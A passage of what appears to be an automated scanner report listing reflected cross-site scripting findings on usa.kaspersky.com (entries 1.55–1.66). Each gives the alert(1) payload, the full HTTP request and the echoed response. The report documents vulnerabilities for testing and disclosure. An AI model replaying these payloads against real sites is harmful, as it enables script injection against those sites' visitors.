Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Mobile%20Security; s_nr=1315139135058-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Mobile%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:24 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141704"
Content-Type: text/html; charset=utf-8
Content-Length: 33267
Date: Sun, 04 Sep 2011 13:08:30 GMT
X-Varnish: 1163125926
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us3511f"><script>alert(1)</script>455d50a023f" />
...[SNIP]...

1.55. http://usa.kaspersky.com/about-us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830d0"-alert(1)-"320fa374e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-us830d0"-alert(1)-"320fa374e08 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Mobile%20Security; s_nr=1315139135058-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Mobile%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:55 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141735"
Content-Type: text/html; charset=utf-8
Content-Length: 30545
Date: Sun, 04 Sep 2011 13:09:22 GMT
X-Varnish: 1163126865
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us830d0"-alert(1)-"320fa374e08";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.56. http://usa.kaspersky.com/about-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2d0"><script>alert(1)</script>a2fb0f73f17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us?6f2d0"><script>alert(1)</script>a2fb0f73f17=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Mobile%20Security; s_nr=1315139135058-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Mobile%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141510"
Content-Type: text/html; charset=utf-8
Content-Length: 34057
Date: Sun, 04 Sep 2011 13:05:32 GMT
X-Varnish: 1163119757
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us?6f2d0"><script>alert(1)</script>a2fb0f73f17=1" />
...[SNIP]...

1.57. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4604"><script>alert(1)</script>49eb04b0130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-use4604"><script>alert(1)</script>49eb04b0130/contact-us HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:59:47 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144787"
Content-Type: text/html; charset=utf-8
Content-Length: 35703
Date: Sun, 04 Sep 2011 13:59:50 GMT
X-Varnish: 1163230428
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-use4604"><script>alert(1)</script>49eb04b0130/contact-us" />
...[SNIP]...

1.58. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcef7"-alert(1)-"ca2b6d35942 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-usdcef7"-alert(1)-"ca2b6d35942/contact-us HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:59:59 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144799"
Content-Type: text/html; charset=utf-8
Content-Length: 34415
Date: Sun, 04 Sep 2011 14:00:01 GMT
X-Varnish: 1163230755
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-usdcef7"-alert(1)-"ca2b6d35942/contact-us";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.59. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43d62"-alert(1)-"396773fa193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-us/contact-us43d62"-alert(1)-"396773fa193 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:00:34 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144834"
Content-Type: text/html; charset=utf-8
Content-Length: 34479
Date: Sun, 04 Sep 2011 14:00:38 GMT
X-Varnish: 1163232603
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
p4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/contact-us43d62"-alert(1)-"396773fa193";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.60. http://usa.kaspersky.com/about-us/contact-us [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93f3f"><script>alert(1)</script>8c4eaed748a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/contact-us93f3f"><script>alert(1)</script>8c4eaed748a HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:00:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144820"
Content-Type: text/html; charset=utf-8
Content-Length: 35768
Date: Sun, 04 Sep 2011 14:00:24 GMT
X-Varnish: 1163231801
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/contact-us93f3f"><script>alert(1)</script>8c4eaed748a" />
...[SNIP]...

1.61. http://usa.kaspersky.com/about-us/contact-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55f0"><script>alert(1)</script>c4fbba611eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/contact-us?b55f0"><script>alert(1)</script>c4fbba611eb=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:59:24 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144764"
Content-Type: text/html; charset=utf-8
Content-Length: 41989
Date: Sun, 04 Sep 2011 13:59:39 GMT
X-Varnish: 1163229645
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/contact-us?b55f0"><script>alert(1)</script>c4fbba611eb=1" />
...[SNIP]...

1.62. http://usa.kaspersky.com/about-us/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb34"-alert(1)-"f6e6b16c6e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-usfeb34"-alert(1)-"f6e6b16c6e2/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:30 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145490"
Content-Type: text/html; charset=utf-8
Content-Length: 34690
Date: Sun, 04 Sep 2011 14:11:38 GMT
X-Varnish: 1163257807
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-usfeb34"-alert(1)-"f6e6b16c6e2/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.63. http://usa.kaspersky.com/about-us/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a50"><script>alert(1)</script>4af2ba5c2d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us29a50"><script>alert(1)</script>4af2ba5c2d8/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:57 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145457"
Content-Type: text/html; charset=utf-8
Content-Length: 32163
Date: Sun, 04 Sep 2011 14:11:05 GMT
X-Varnish: 1163256578
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us29a50"><script>alert(1)</script>4af2ba5c2d8/index.html" />
...[SNIP]...

1.64. http://usa.kaspersky.com/about-us/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfb91"><script>alert(1)</script>26b2aedd759 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/index.htmlcfb91"><script>alert(1)</script>26b2aedd759 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145530"
Content-Type: text/html; charset=utf-8
Content-Length: 35488
Date: Sun, 04 Sep 2011 14:12:16 GMT
X-Varnish: 1163259209
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/index.htmlcfb91"><script>alert(1)</script>26b2aedd759" />
...[SNIP]...

1.65. http://usa.kaspersky.com/about-us/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afee"-alert(1)-"30c582827e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-us/index.html1afee"-alert(1)-"30c582827e1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:45 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145565"
Content-Type: text/html; charset=utf-8
Content-Length: 35563
Date: Sun, 04 Sep 2011 14:12:48 GMT
X-Varnish: 1163260505
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
p4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/index.html1afee"-alert(1)-"30c582827e1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.66. http://usa.kaspersky.com/about-us/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d145"><script>alert(1)</script>2fdc71b9919 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/index.html?4d145"><script>alert(1)</script>2fdc71b9919=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:08 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145228"
Content-Type: text/html; charset=utf-8
Content-Length: 39318
Date: Sun, 04 Sep 2011 14:07:15 GMT
X-Varnish: 1163247766
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/index.html?4d145"><script>alert(1)</script>2fdc71b9919=1" />
...[SNIP]...

